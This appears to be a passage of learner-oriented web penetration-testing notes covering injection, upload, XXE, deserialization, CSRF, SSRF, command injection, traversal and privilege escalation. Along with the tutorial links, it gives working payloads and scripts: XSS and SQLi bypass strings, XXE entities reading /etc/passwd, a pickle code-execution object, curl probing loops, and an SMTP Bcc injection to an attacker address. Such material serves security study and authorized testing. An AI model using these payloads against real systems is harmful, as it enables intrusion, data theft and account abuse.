%<script>3cscript%<script>3ealert(1)%<script>3c/script%<script>3e
(that last one targets filters that strip "<script>" once: after the strip, the URL-encoded tags remain and decode to a working script tag)
HTML5 Security Cheatsheet

HTML Injection: Submit HTML into a Comment field or theme; it gets stored in the database, and later other users view your "comment" or use your theme, and get fooled by your HTML.
Hacking Articles' "Beginner Guide to HTML Injection"

CRLF Injection:
Submit a parameter or request that has an encoded CRLF in the middle of it. Could be useful: Offensive Security by Automation's "Automating CRLF"
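
For example, if a parameter value ends up reflected in a response header (a redirect target, a cookie value), an encoded CRLF may let you inject a header of your own. A minimal sketch with a made-up endpoint and parameter:

# If the value of ?next= is reflected into a response header, an encoded CRLF
# (%0d%0a) may split that header and smuggle in a new one.
import requests

payload = "%0d%0aSet-Cookie:%20crlf=injected"
r = requests.get("https://target.example/redirect?next=/home" + payload,   # hypothetical endpoint
                 allow_redirects=False, timeout=10)
print(r.status_code)
print(r.headers.get("Set-Cookie"))    # did the injected header come back as a real one?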

Null Byte Injection:
Submit a parameter or request that has an encoded 0 byte (\x00, %00) in the middle of it. Could be useful if the page is taking the parameter and appending more characters (such as ".jpeg") to it. The null byte may cause the additional characters to be ignored; for example, "shell.php%00" may end up used as "shell.php" even though the app appended ".jpeg".

Most browsers will strip "%00" from URLs, but Burp will let you put them in.

Encoding Sniffing:
Encode characters in some unusual way that the sanitizing code or encoder won't catch, but the browser will interpret in useful ways.

For example, if the page encoding is not specified, older browsers (such as IE8 and earlier) will accept UTF-7 such as:
+ADw-script+AD4-alert(1);+ADw-/script+AD4-
which will survive sanitizing and URL-encoding, but the browser interprets as:
<script>alert(1);</script>

Mark Baggett's "Come to the Dark Side - Python's Sinister Secrets" (PDF slideshow)

File Upload:
If the app has a function that lets a user upload a file to the server, give it filenames that contain "../", or that match the name of an existing file (web page or included file) on the server. Give it a valid filename but a dangerous extension (.html, .js, .php, etc).

Or send an HTML file, with name and extension set to something allowed (such as jpeg), but MIME type set to "text/html". If the MIME type gets stored in the database and comes back to the browser later, the browser may use it. [Some older browsers such as IE 6 or 7 may interpret the file as HTML even if the MIME type is set to "image/jpeg", if they see enough HTML inside it. This is called "MIME sniffing".]
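
A hedged sketch of that MIME-type trick with Python requests (the upload URL, form field name and session cookie are hypothetical; adapt them to the app's real upload form):

# Upload a file whose name looks like an allowed image, but whose declared MIME
# type and contents are HTML. If the app stores and later serves the declared
# type, a victim's browser may render it as a page.
import requests

files = {
    "avatar": ("profile.jpeg",                                        # allowed-looking filename
               "<html><script>alert(document.domain)</script></html>",
               "text/html"),                                          # spoofed MIME type
}
r = requests.post("https://target.example/profile/upload",            # hypothetical endpoint
                  files=files,
                  cookies={"session": "YOUR-SESSION-ID"},
                  timeout=10)
print(r.status_code, r.text[:200])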

Send an XML file. Perhaps field values are not validated properly, and you can put HTML or Javascript somewhere where it will be displayed/executed later.
OWASP's "Testing for XML Injection (OTG-INPVAL-008)"
Some other file types actually are XML inside, or can contain XML. Such as: .docx, .xlsx, .pptx, .wsdl, .gpx (GPS stuff), .xspf (playlist), .dae (digital asset exchange), many others.

Some image files (PNG) can contain "chunks" that are text or general data. Maybe HTML or scripting can be put into those chunks, or into EXIF ?
PNG (Portable Network Graphics) Specification, Version 1.2 - 4. Chunk Specifications
idontplaydarts' "Encoding Web Shells in PNG IDAT chunks"

Send an archive file (tar, zip, etc) that has filenames inside that have "../" in them ?

Suppose the file is immediately moved somewhere else, using an OS command such as mv or cp ? Give a filename such as "name.jpg;ls;" and see if anything happens.

Sites often use Content Delivery Networks (CDNs), putting user-supplied content on a different domain, to avoid some of these problems. The HTML or code in the file would be "executed" in the domain of the file, not the domain of the page, so would not have access to cookies etc.

Hacking Articles' "5 ways to File upload vulnerability Exploitation"
Hacking Articles' "Web Shells Penetration Testing (Beginner Guide)"
Jean Fleury's "Cross-Site Scripting and File Uploads"
int0x33's "Upload .htaccess as image to bypass filters"
Brute's "File Upload XSS"
OWASP's "Unrestricted File Upload"
Mathias Karlsson and Frans Rosen's "The lesser known pitfalls of allowing file uploads on your website"

Script Injection:
Give Web/App server a request with scripting in parameters or form fields, and get it to return a page containing that scripting.

This is "reflected scripting", and not really valuable in that it's running with your creds and in your browser. But it reveals that the pages or Web/App Server are handling input unsafely.

If you can't get a whole script tag in, maybe you can add an attribute such as onFocus or onLoad or onMouseOver to an existing tag.
Attacker --req with script in params or fields--> Web/App Server
Attacker <--page with script active-- Web/App Server
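
A quick way to find candidate pages is to send a unique marker containing special characters in each parameter and check whether it comes back unescaped (a sketch; the URL and parameter names are made up):

# Reflection test: if the raw marker (with quotes and angle brackets intact)
# appears in the response, the parameter is not being HTML-encoded.
import requests

marker = "zqx9\"'<u>zqx9</u>"
for param in ["q", "search", "name"]:        # hypothetical parameter names
    r = requests.get("https://target.example/page", params={param: marker}, timeout=10)
    if marker in r.text:
        print("parameter", param, "reflects special characters unescaped")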

SQL Injection (SQLi):
Give Web/App server a request with SQL or SQL fragments in parameters or form fields, and see if it sends your SQL to the database.

Examples:
' OR 1=1 --
' OR 1='1
SLEEP(10) /*' or SLEEP(10) or '" or SLEEP(10) or "*/
1' or '1'='1
admin'--
SELSELECTECT COUNT(*) from USERS;
(the doubled keyword survives filters that strip "SELECT" once)
For username field of a login page:
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
Three phases:
"balance" is where you end the apps SQL gracefully,
"inject" is where you write your own SQL,
"comment" is where you comment out any trailing SQL so it doesn't throw an error.

"Inject" could be a complete new SQL statement, or could be a clause added to the existing statement with UNION or something.

In SQL, a UNION appends output rows from another SELECT to the output rows of the first SELECT. The two SELECTs have to produce the same number and types of columns.
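
A worked example of the three phases, assuming a lookup whose id parameter is concatenated into a single-quoted SQL string and whose original SELECT returns two columns (all names hypothetical):

# Original query (guessed):  SELECT name, price FROM products WHERE id = '<id>'
payload = (
    "x'"                                  # balance: close the app's open quote
    " UNION SELECT username, password"    # inject: pull two columns from another table
    " FROM users"
    " -- "                                # comment: discard the trailing quote/SQL (MySQL needs a space after --)
)
# Sent as something like:
#   /product?id=x%27%20UNION%20SELECT%20username,%20password%20FROM%20users%20--%20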

Some forms of SQLi:
The SQL sent to the database could:
"Blind" SQLi is when you can't directly see the result of the SQL operation.

Look for anywhere that the user or client page is specifying SQL terms directly, such as ASC or DESC or a column number for the ORDER BY clause.

It's very helpful to know what type of database server is present; SQL for them varies.

Paraphrased from Zenodermus Javanicus's "Basic of SQL for SQL Injection part 2":
If the input value is enclosed in single quotes in the SQL stmt, a single quote as input will give an error.
If the input value is enclosed in double quotes in the SQL stmt, a double quote as input will give an error.
If the input value is not enclosed in anything in the SQL stmt, either a single quote or a double quote as input will give an error.

Different database server types give different error msg formats; see the article for details.

If you're getting visibility of only a single value, use SQL like:
-- return values starting from row 0, return only 1 row's data
Select Username from users limit 0,1;

If you're getting visibility of only a single row, use SQL like:
-- return values starting from row 0, return only 1 row's data
Select * from users limit 0,1;

Resources:
SQLZoo
SQL Fiddle
Jayson Grace's "SQL Cheatsheet"

Guru99's "SQL Injection Tutorial: Learn with Example"
SQL Injection articles in Hacking Articles' "Web Penetration Testing"
See Chapter 9 "Attacking Data Stores" in "The Web Application Hacker's Handbook" by Stuttard and Pinto (on Amazon).
Series of 5 articles starting with DRD_'s "Database & SQL Basics Every Hacker Needs to Know"
DRD_'s "Attack Web Applications with Burp Suite & SQL Injection"
Allen Freeman's "The Essential Newbie's Guide to SQL Injections and Manipulating Data in a MySQL Database"
DRD_'s "Use SQL Injection to Run OS Commands & Get a Shell"
Wikipedia's "SQL injection"
Security Idiots' "Posts Related to Web-Pentest-SQL-Injection"

Portswigger's "SQL injection cheat sheet" (probably requires login)
EdOverflow / bugbounty-cheatsheet / SQLI.md
netsparker's "SQL Injection Cheat Sheet"
trietptm / SQL-Injection-Payloads
Polyglot injection strings.
Maybe most likely on pages that are sorting data or showing tables of data.
pentestmonkey's "SQL Injection" cheat sheets
Reiner's "SQLi filter evasion cheat sheet (MySQL)"
"Rails SQL Injection"


Server-Side Template Injection (SSTI):
For sites using a server-side template engine such as Jinja2 (used by Flask), Mako, Jade, Slim or ERB (Ruby), Velocity, or Smarty. The usual telltale is a construct like "{{title}}" in the URL or HTML.

Give Web/App Server a request with template code in parameters or form fields, and see if the Template Engine executes the code.
Attacker --req with malicious template code in param--> Web/App Server + Template Engine
Attacker   <--page with template code executed-- Web/App Server + Template Engine

This is "reflected templating", and it's running with your creds. But it reveals that the pages or Web/App Server or Template Engine are handling input unsafely.

Maybe this can be used to get the Template Engine to run code you give it. Depending on how and where the Template Engine is running, this could give access to files or commands on the Web/App Server or Template Engine Server, or enable requests to other servers. If you can modify files on the servers, maybe you can modify pages that are served to other users.
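
A common first probe is to submit a template expression such as {{7*7}} and look for the evaluated result in the response (a sketch; the endpoint and parameter are made up, and the {{ }} syntax is Jinja2/Twig-style, other engines use different delimiters):

# SSTI probe: if "49" comes back where "{{7*7}}" went in, something server-side
# is evaluating your input as a template.
import requests

r = requests.get("https://target.example/hello",      # hypothetical endpoint
                 params={"name": "{{7*7}}"}, timeout=10)
if "49" in r.text and "{{7*7}}" not in r.text:
    print("input appears to be evaluated by a server-side template engine")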

From James Kettle's "Server-Side Template Injection":
"The 'Server-Side' qualifier is used to distinguish this from vulnerabilities in client-side templating libraries such as those provided by jQuery and KnockoutJS."

Sven Morgenroth's "Server-Side Template Injection Introduction & Example"
EdOverflow / bugbounty-cheatsheet / Template Injection
tplmap

Client-Side Template Injection (CSTI):
For sites using a client-side template engine/library such as AngularJS, Angular, React, or Vue. The usual telltale is a construct like "{{title}}" in the URL or HTML.

The attack could be:
Then the attacker's code is running in the user's browser, and could do a Request Forgery or Browser Exploitation or something.

tijme / angularjs-csti-scanner

Client-side HTTP Parameter Pollution (CSHPP):
The Web/App Server expects an HTTP request with parameters, and builds a request to the Back-End Server from them. But you give it a request with extra or duplicate or malformed parameters, so the request to the Back-End Server becomes malicious.
Attacker --req with malicious params--> Web/App Server --malicious req--> Back-End Server

Server-side HTTP Parameter Pollution (SSHPP):
Back-End Server expects an HTTP request from Web/App Server. But you give it a malicious request directly from your browser with extra or duplicate or malformed parameters, and Back-End Server executes the request.
Attacker --req with malicious params--> Back-End Server
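
A quick way to probe for parameter pollution is to send the same parameter twice and see which value each layer honours; some servers take the first, some the last, some concatenate (the endpoint and parameter are made up):

# Duplicate-parameter probe: the request goes out as ?amount=10&amount=9999.
import requests

r = requests.get("https://target.example/transfer",   # hypothetical endpoint
                 params=[("amount", "10"), ("amount", "9999")],
                 timeout=10)
print(r.status_code, r.text[:200])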

There are other kinds of "injections": LDAP, XPath (XML Path Language; query for XML data), IMAP, SMTP.

Insecure Direct Object Reference (IDOR):
Sometimes called "forced browsing" ?

Parameters in URL or in POST are referencing objects, but the parameters can be changed to reference other objects.

The classic example is a URL like "domain/page?userid=1234&operation=buy". Change userid to another number, and do a purchase using that user's info.
Attacker --req with changed params--> Web/App Server
zseano's "Insecure Object Reference (IDOR) - Where are they?!"
Hacking Articles' "Beginner Guide to Insecure Direct Object References (IDOR)"

Open Redirect:
A web app page redirects the user to some other page, but you find a way to change the redirection so they go to your page instead. The user may not notice that they're no longer in the trusted app.

Several code types that do a redirect:
Try changing the protocol in the redirect, from HTTPS to HTTP, or HTTP to FTP.

But how do you change a redirect in code supplied to some other user ? I guess you have to do a different exploit to do that.

If code checks that the redirected-to URL is valid, you have to fool that code somehow.

zseano's "Open Url Redirects"
OWASP's "Testing for Client Side URL Redirect (OTG-CLIENT-004)"
OWASP / CheatSheetSeries / Unvalidated_Redirects_and_Forwards_Cheat_Sheet.md



Unsafe API Input Handling

An API essentially is a complete additional attack surface, subject to many of the same vulnerabilities that a web app may have: SQLi, IDOR, etc.

XML External Entities (XXE):
("The 'S' in 'XML' stands for 'Security'.")

XML objects usually contain data, but they can contain items that fetch from a URL or cause execution of code.

(This is similar to Server-Side Request Forgery (SSRF) in that the object usually will be parsed and executed by the web/app server.)

Fetch can be done by defining a new "entity" inside the file, of the form
<!ENTITY foo SYSTEM "file:///etc/passwd" >
so that a reference to "&foo;" then causes the file to be fetched. Also
<!ENTITY foo SYSTEM "http://www.example.com/script.php" >

Also send XSLT that generates HTML.

Internal DTD Declaration: inside the XML, add DTD (maybe through a DOCTYPE line that references an external DTD file, or through ENTITY lines) that affects how the XML is parsed and maybe executed.

Some other file types actually are XML inside, or can contain XML. Such as: .docx, .xlsx, .pptx, .wsdl, .gpx (GPS stuff), .xspf (playlist), .dae (digital asset exchange), many others.

The attack could be:
Attacker --XML with malicious content--> API Server
Attacker <--result with secret data-- API Server
This attack could be to an API server, or just a file upload to a file/web server. It's a form of code or script injection, I guess.
klose's "XXE Attacks - Part 1: XML Basics"
Robert Schwass's "XML External Entity - Beyond /etc/passwd (For Fun & Profit)"
EdOverflow / bugbounty-cheatsheet / XXE
EdOverflow / bugbounty-cheatsheet / XSLT Injection
OWASP's "Testing for XML Injection (OTG-INPVAL-008)"

Insecure Deserialization:
Find where an app accepts a serialized object over RPC or out of database or something, and give it a modified or malicious object. The object could have a forged data state, or cause code execution.

Some client-side frameworks which communicate with app server using serialized objects: Flex, Silverlight, Java, Flash.

DSer plug-in to Burp Suite for viewing and manipulating serialized Java objects. Flash AMF support is built into Burp. WCF binary SOAP plug-in for Burp handles Silverlight WCF / NBFS.
Attacker --serialized object with malicious content--> API Server
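
The underlying risk is easiest to see with Python's pickle (an analogy only; the frameworks above use their own formats, but the principle is identical: deserializing attacker-controlled bytes can run attacker-chosen code):

# Demonstration against yourself only: a pickled object whose __reduce__ makes
# the *deserializing* side run an OS command.
import pickle, os

class Evil:
    def __reduce__(self):
        return (os.system, ("id",))     # a harmless command, just to prove execution

blob = pickle.dumps(Evil())             # this is what an attacker would hand to the app
pickle.loads(blob)                      # "deserializing" it runs the command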

Linus Sarud's "OWASP TOP 10: Insecure Deserialization"
Aditya Chaudhary's "Insecure Deserialization"

Insecure API:
Many mobile and web-app APIs (RESTful APIs, SOAP, GraphQL, more) involve sending a data or command object (encoded as XML, JSON, HTML, etc) over an HTTP connection. If user-supplied data can get into those objects, maybe something malicious can be done.

A web app function that sends email may feed user input into an SMTP connection. Try appending "%0aBcc:you@attacker.com" to the end of the From address. Try "Cc" instead of "Bcc", try "%0d%0a" instead of "%0a". In the body of the message, you may be able to end one message and start a second different message to a different address.

Look in web server's /.well-known directory for any files that represent API capabilities.
Attacker --object with malicious content--> API Server
or
Attacker --req with malicious params--> Web/App Server --object with malicious content--> API Server

Ole Lensmar's "API Security Testing" (slideshow)
Sharanbasu Panegav's "API Penetration Testing with OWASP 2017 Test Cases"
Viacheslav Dontsov's "API testing: useful tools, Postman tutorial and hints"
Mike Yockey's "API Testing with Postman"
Rushyendra Reddy Induri's "Getting Started with Postman for API Security Testing: Part 1"
Mic Whitehorn-Gillam's "Better API Penetration Testing with Postman - Part 1"
James Messinger's "API testing tips from a Postman professional"
Get Postman for Linux
RESTClient
REST test test ...
Prakash Dhatti's "Penetration Testing RESTful Web Services"
OWASP / CheatSheetSeries / REST_Assessment_Cheat_Sheet.md
Jean Fleury's "Web Services and SOAP Injections"
streaak/keyhacks (ways to test leaked API keys to see if they're valid)

Ajax:
Used inside a web page to make asynchronous requests back to the web/app server. May send XML or JSON or plain form data over HTTP. Uses the XMLHttpRequest object in Javascript.



Exploitation

Directory Traversal:
If you can get access to the filesystem of a server, either via modification of a page, or via unexpected URLs or URL parameters, you can try many different filenames to see if they exist and can be read. And you can add prefixes to the filenames to go up and down in the directory tree.
Attacker --req for file X--> Web/App Server
Attacker <--contents of file X-- Web/App Server
Example prefixes:
../
..\
....//
%2E%2E%2F
..%252f
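
A small sketch that tries each of the prefixes above at increasing depths against a parameter that looks like it names a file (the endpoint and parameter are made up; note that requests will re-encode some characters, so for full control over encoding use an intercepting proxy):

# Try traversal prefixes at several depths, looking for /etc/passwd in the response.
import requests

url = "https://target.example/download"        # hypothetical endpoint
prefixes = ["../", "..\\", "....//", "%2E%2E%2F", "..%252f"]

for prefix in prefixes:
    for depth in range(1, 8):
        candidate = prefix * depth + "etc/passwd"
        r = requests.get(url + "?file=" + candidate, timeout=10)
        if "root:" in r.text:
            print("traversal works with:", candidate)
            break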

DRD_'s "Perform Directory Traversal & Extract Sensitive Information"
DRD_'s "How to Find Directories in Websites Using DirBuster"
Look in /robots.txt for stuff that's not supposed to be exposed.
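
A crude loop over those prefixes at a few depths, assuming a hypothetical file= parameter that the app uses to read something from disk; "root:" in the response suggests /etc/passwd came back:

# Hypothetical vulnerable parameter; increase the depth range if the web root is buried deeper.
for p in '../' '..\' '....//' '%2e%2e%2f' '..%252f'; do
  prefix=''
  for n in 1 2 3 4 5 6; do
    prefix="${prefix}${p}"
    curl -s "https://target.example/download?file=${prefix}etc/passwd" | grep -q 'root:' \
      && echo "hit at depth $n with prefix $p"
  done
done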

On-site Request Forgery (OSRF) (AKA "session riding"):
Give a user a malicious page or frame from the application, while they're logged into the Web/App Server. Then the malicious code can do application operations using the user's credentials/authentication.

This is called "on-site" or "stored" RF; the malicious code is stored in the database.
Attacker --req with malicious script--> Web/App Server --SQL to store malicious script--> Database Server
User --request--> Web/App Server --SQL--> Database Server
User <--page with malicious script-- Web/App Server <--data containing malicious script-- Database Server
User --request by attacker's script--> Web/App Server
This is attacking the other users, not the underlying application, really. Your script will be executing with their credentials. Of course, if one of them is an admin user, then your script can do more.

Modified from "Penetration Testing" by Georgia Weidman (on Amazon):
"RF exploits a website's trust in the user's browser".

See Chapter 13 "Attacking Users: Other Techniques" in "The Web Application Hacker's Handbook" by Stuttard and Pinto (on Amazon).

Cross-Site Request Forgery (CSRF or XSRF):
User is logged into the Web/App Server. Get them to open a page from Attacker's Server, and that page does application operations using their credentials/authentication.

This is "cross-site" because the malicious code running in another domain makes a request to the web-app in its domain.

But it's a bit different from reflected XSS in that here the request crosses origins: it comes from a different domain. The same-origin policy doesn't block the request itself, only the attacker's ability to read the response back in the browser, so it's up to the web-app to decide whether the request is legitimate. The operation has to be accomplished in one request; there is no opportunity for req1-resp1-req2...

From Chapter 13 "Attacking Users: Other Techniques" in "The Web Application Hacker's Handbook" by Stuttard and Pinto (on Amazon):
The same-origin policy does not prohibit one website from issuing requests to a different domain. It does, however, prevent the originating website from processing the responses to cross-domain requests.


Often this is prevented by using "anti-CSRF tokens": the app server sends a random token and requires it to be embedded in any state-changing operation sent back. If an app doesn't do this, it may be vulnerable. Relying only on a cookie is not good enough, because the browser automatically attaches that cookie to every request to the domain it is associated with, even if the request originates from another domain.

The anti-CSRF token would be embedded in a POST form back to the server, not a GET. If an app is changing state through GETs, probably something is wrong with the design.
User --request--> Attacker's Server
User <--page with malicious script-- Attacker's Server
User --request by attacker's script--> Web/App Server
This is attacking the other users, not the underlying application, really. Your script will be executing with their credentials. Of course, if one of them is an admin user, then your script can do more.

From "Penetration Testing" by Georgia Weidman (on Amazon):
"CSRF exploits a website's trust in the user's browser".

Sjoerd Langkemper's "Cross site request forgery (CSRF)"
DRD_'s "Manipulate User Credentials with a CSRF Attack"
See Chapter 13 "Attacking Users: Other Techniques" in "The Web Application Hacker's Handbook" by Stuttard and Pinto (on Amazon).
CSRF articles in Hacking Articles' "Web Penetration Testing"
zseano's "Bypassing CSRF protection"
zseano's "CSRF 'protection' bypass on xvideos"
Trust Foundry's "Cross-Site Request Forgery Cheat Sheet"
debasishm89 / burpy runs on a Burp log file and reports places where a CSRF bypass (avoiding the defenses) might be viable.
Anastasis Vasileiadis' "XSRFProbe - The Prime Cross Site Request Forgery Audit And Exploitation Toolkit"
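
A quick manual check against a hypothetical password-change endpoint: replay the state-changing request with a valid session cookie but without the anti-CSRF token (and again with a garbage token); if the change still goes through, the protection is missing or not enforced:

# Hypothetical endpoint and field names; paste in a real session cookie from your test account.
curl -s -i -b 'session=PASTE_VALID_SESSION_COOKIE' \
  -d 'new_password=Winter2019x&confirm_password=Winter2019x' \
  https://target.example/account/change-password | head -n 20
# Repeat with &csrf_token=garbage appended to the body and compare the responses.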

Common critical functions to try CSRF:

Look for /crossdomain.xml (Flash) and /clientaccesspolicy.xml (Silverlight) files.

To test an application's handling of cross-domain requests using XMLHttpRequest, try adding an Origin header specifying a different domain, and examine any Access-Control headers that are returned.

Server-Side Request Forgery (SSRF):
Usually shown as something like "redirect.php?url=http://www.google.com", where the URL comes from the user or the client page somehow, or you can modify it.

Browser requests go to the Web/App Server, which normally turns around and makes a request to a Back-End Server. Try to modify parameters so the Web/App Server requests some other server instead. Or submit a "file:///etc/passwd", "http://localhost/something", "http://127.0.0.1/something", "telnet://databaseserver", or "http://databaseserver:23/" URL.

This vuln usually shows up where one system talks to another, with some degree of user input or control.

A vuln involving a POST request might be more powerful than one involving a GET request, since POST usually is used to write data.
Attacker --req with malicious params--> Web/App Server --malicious req--> File Server

Detectify's "What is server side request forgery (SSRF)?"
EdOverflow / bugbounty-cheatsheet / SSRF.md
Wallarm / SSRF bible
SaN ThosH's "SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1"
SaN ThosH's "SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-2"
SaN ThosH's "SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-3"
Shorebreak Security's "SSRF's up! Real World Server-Side Request Forgery (SSRF)"
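
A sketch of the obvious probes against a hypothetical redirect.php?url= parameter; differences in status code, response size, or timing hint at what the back end can reach (URL-encode the value if the app is picky):

# Hypothetical fetch/redirect endpoint; 169.254.169.254 is the usual cloud metadata address.
for u in 'http://127.0.0.1/' 'http://localhost:8080/' 'file:///etc/passwd' \
         'http://169.254.169.254/latest/meta-data/' 'http://databaseserver:23/'; do
  printf '%s -> ' "$u"
  curl -s -o /dev/null -w '%{http_code} %{size_download} bytes %{time_total}s\n' \
    "https://target.example/redirect.php?url=$u"
done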

Command Injection:
When there is some way for pages to cause the Web/App Server to execute OS commands on its OS, there may be a fault that allows unexpected commands to be run. Any place where a parameter from the user is being used in an OS command gives the chance to terminate that command and add a second command, or add a second argument to the original command.

In PHP, the command primitive is exec(). In ASP, wscript.shell(). In Perl, any command between a pair of back-ticks (`).

If a parameter is being passed into a command string, try pipe symbol (|) or double-pipe (||) or ampersand (&) or semi-colon (; or %3b), followed by a command you want to run.

If you can't see the results of a command, try injecting a time-delay. Such as command "ping -c 2 -i 30 -n 127.0.0.1" to delay 30 seconds. Or use a command to create a file which you then can browse to, such as "ls > /var/www/html/foo.txt" or "dir > c:\inetpub\wwwroot\foo.txt" (you have to figure out the OS type and mapping from web root to OS directory). Or use a network command such as TFTP or netcat to contact attacker's server.
Attacker --req to run "cat /etc/passwd"--> Web/App Server
Attacker <--contents of /etc/passwd-- Web/App Server

DRD_'s "Use Command Injection to Pop a Reverse Shell on a Web Server"
Hacking Articles' "Beginner Guide to OS Command Injection"
Carrie Roberts' "OS Command Injection; The Pain, The Gain"
OWASP's "Testing for Command Injection (OTG-INPVAL-013)"
Commix
EdOverflow / bugbounty-cheatsheet / RCE
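
A blind, time-based version of the check described above, against a hypothetical "ping this host" feature; sleep is used here for simplicity, and the ping trick above works where sleep is filtered. A response that suddenly takes ~25 seconds longer is the tell:

# Baseline the normal response time, then retry with an injected delay after each separator.
base=$(curl -s -o /dev/null -w '%{time_total}' 'https://target.example/tools/ping?host=127.0.0.1')
for sep in '%3b' '%7c' '%7c%7c' '%26%26' '%0a'; do
  t=$(curl -s -o /dev/null -w '%{time_total}' \
    "https://target.example/tools/ping?host=127.0.0.1${sep}sleep+25")
  echo "separator $sep : ${t}s (baseline ${base}s)"
done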

Privilege Escalation:
If you can get access to the OS level of a server, either via Command Injection from a page, or via Shell Access, maybe you can escalate access from normal user to more powerful user.

On Linux, some standard privilege-escalation paths are: su, sudo, sudoedit, visudo, pkexec, admin:// URI scheme (as in "xed admin:///etc/passwd"), "s" bit in file permissions, cron jobs, putting system in single-user mode (run level 1). Some non-standard or distro-specific or non-Linux commands: calife, op, super, kdesu, kdesudo, ktsuss, beesu, gksu, gksudo, pfexec, in GUI file-explorer or desktop right-click and select "Open as root". For editing specific files: vipw, vigr.

Linux Privilege Escalation articles in Hacking Articles' "Penetration Testing"
TokyoNeon's "How to Perform Privilege Escalation, Part 1 (File Permissions Abuse)"
TokyoNeon's "How to Perform Privilege Escalation, Part 2 (Password Phishing)"
DRD_'s "Perform Local Privilege Escalation Using a Linux Kernel Exploit"
Barrow's "Use a Misconfigured SUID Bit to Escalate Privileges & Get Root"
OccupyTheWeb's "Finding Potential SUID/SGID Vulnerabilities on Linux & Unix Systems"
Bill Tsapalos's "Hack Metasploitable 2 Including Privilege Escalation"
Rashid Feroze's "A guide to Linux Privilege Escalation"
Once you have root privilege: int0x33's "Privilege Escalation (Linux) by Modifying Shadow File for the Easy Win"
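
Before any of that pays off you need to find a path up, so some quick first-pass enumeration once you have a shell (standard commands, nothing target-specific):

# Look for set-uid/set-gid binaries, sudo rights, cron jobs, and interesting accounts.
find / -perm -4000 -type f 2>/dev/null     # set-uid binaries
find / -perm -2000 -type f 2>/dev/null     # set-gid binaries
sudo -l                                    # what can this account run via sudo?
ls -la /etc/cron* /var/spool/cron 2>/dev/null
cut -d: -f1,3,7 /etc/passwd                # users, UIDs, shells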

Remote Code Execution (RCE):
The ultimate achievement, especially if it's with root privilege. A request across the internet causes execution of an OS command or other code on the target. The code could create, update or delete files, exfiltrate files or information, open a remote shell, attack other machines on the LAN, etc.

Really this is a form of Command Injection, coming from outside.



Combined / Other

Cross-Site Scripting (XSS):
A confusing mega-term that has grown over the years, and often in ways that don't match the name at all. Some forms of it are not "cross-site", and some forms don't involve scripting. And it mixes two steps: input and exploitation.

XSS targets an individual user, usually by getting a malicious page or script into their browser.

From Portswigger's "Web Security Academy":
[XSS] is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data.

Some forms of XSS: reflected, stored, and DOM-based. Each of these involves a first step to get bad data in (bad parameters, SQLi, Script Injection, Template Injection, etc) and then a second step to do exploitation (Request Forgery or redirection or other).

[For reflected and DOM-based XSS:]
From Chapter 12 "Attacking Users: Cross-Site Scripting" in "The Web Application Hacker's Handbook" by Stuttard and Pinto (on Amazon):
... you may be forgiven for wondering why, if the attacker can induce the user to visit a URL of his choosing, he bothers with the rigamarole of transmitting his malicious JavaScript via the XSS bug in the vulnerable application. Why doesn't he simply host a malicious script on attacker.com and feed the user a direct link to this script? Wouldn't this script execute in the same way as it does in the example described?

To understand why the attacker needs to exploit the XSS vulnerability, recall the same-origin policy that was described in Chapter 3. Browsers segregate content that is received from different origins (domains) in an attempt to prevent different domains from interfering with each other within a user's browser. The attacker's objective is not simply to execute an arbitrary script but to capture the user's session token. Browsers do not let just any old script access a domain's cookies; otherwise, session hijacking would be easy. Rather, cookies can be accessed only by the domain that issued them. They are submitted in HTTP requests back to the issuing domain only, and they can be accessed via JavaScript contained within or loaded by a page returned by that domain only. Hence, if a script residing on attacker.com queries document.cookie, it will not obtain the cookies issued by webapp.com, and the hijacking attack will fail.

The reason why the attack that exploits the XSS vulnerability is successful is that, as far as the user's browser is concerned, the attacker's malicious JavaScript was sent to it by webapp.com ... This is why the attacker's script, although it actually originates elsewhere, can gain access to the cookies issued by webapp.com. This is also why the vulnerability itself has become known as cross-site scripting.

Another factor is that the link or page-URL the user sees is that of the (trusted) Web/App Server. The link may come to the user via email, from the Attacker's Server somehow, or from a page or message in the application, but the user trusts it because it points to the real application.

From "Penetration Testing" by Georgia Weidman (on Amazon):
"Cross-site scripting exploits the trust a user has in a website".

Possible payloads/effects of exploiting XSS:

How to approach a web page to look for XSS, from Hacker101 - XSS and Authorization (video):


Excess XSS
Wikipedia's "Cross-site scripting"
OWASP's "Cross-site Scripting (XSS)"
Jean Fleury's "A Not-So-Brief Overview of Cross-Site Scripting"
Jean Fleury's "ClickJacking vs Cross Site Request Forgery"
Kurt Muhl's "Cross-site scripting: How to go beyond the alert"
zseano's "Cross Site Scripting (XSS) - The famous alert"
zseano's "XML XSS via POST"
zseano's "Stored XSS 'domain takeover'
XSS articles in Hacking Articles' "Web Penetration Testing"
DRD_'s "Discover XSS Security Flaws by Fuzzing with Burp Suite, Wfuzz & XSStrike"
DRD_'s "Advanced Techniques to Bypass & Defeat XSS Filters, Part 1"
DRD_'s "Advanced Techniques to Bypass & Defeat XSS Filters, Part 2"
EvilToddler's "Find XSS Vulnerable Sites with the Big List of Naughty Strings"
Joe Smith's "Cross Site Scripting (XSS) Basics"
Alex Long's "Use JavaScript Injections to Locally Manipulate the Websites You Visit"
Alex Long's "How Cross-Site Scripting (XSS) Attacks Sneak into Unprotected Websites (Plus: How to Block Them)"
CrackerHacker's "Exploiting XSS with BEEF (Part 1)"
DomGoat's "Client XSS Introduction"
Bugcrowd University - Cross Site Scripting (XSS) (video)
xssed.com (stale)
reddit's /r/xss might have some bugs posted but the bounty not claimed
Brute's "XSS 101"
Brute's "The 7 Main XSS Cases Everyone Should Know"
Brute's "Probing to Find XSS"
Brute's "File Upload XSS"
Brute's "Using XSS to Control a Browser"
Holly Graceful's "ClickJacking and JavaScript KeyLogging in Iframes"
See Chapter 12 "Attacking Users: Cross-Site Scripting" in "The Web Application Hacker's Handbook" by Stuttard and Pinto (on Amazon).
Security Idiots' "Posts Related to Web-Pentest-XSS"

Sites that often are vulnerable: sites that allow users to edit themes, or add CSS, or set event/meeting name, or show your Facebook page in a frame, or specify filename for uploading, or set a custom Error page.
"Multi-context polyglot payload": String that tries to work in many different contexts, so you don't spend a lot of times trying many approaches.

Tools, mostly:

XSS.Cx (a Crawler and Injection Reporting Tool)
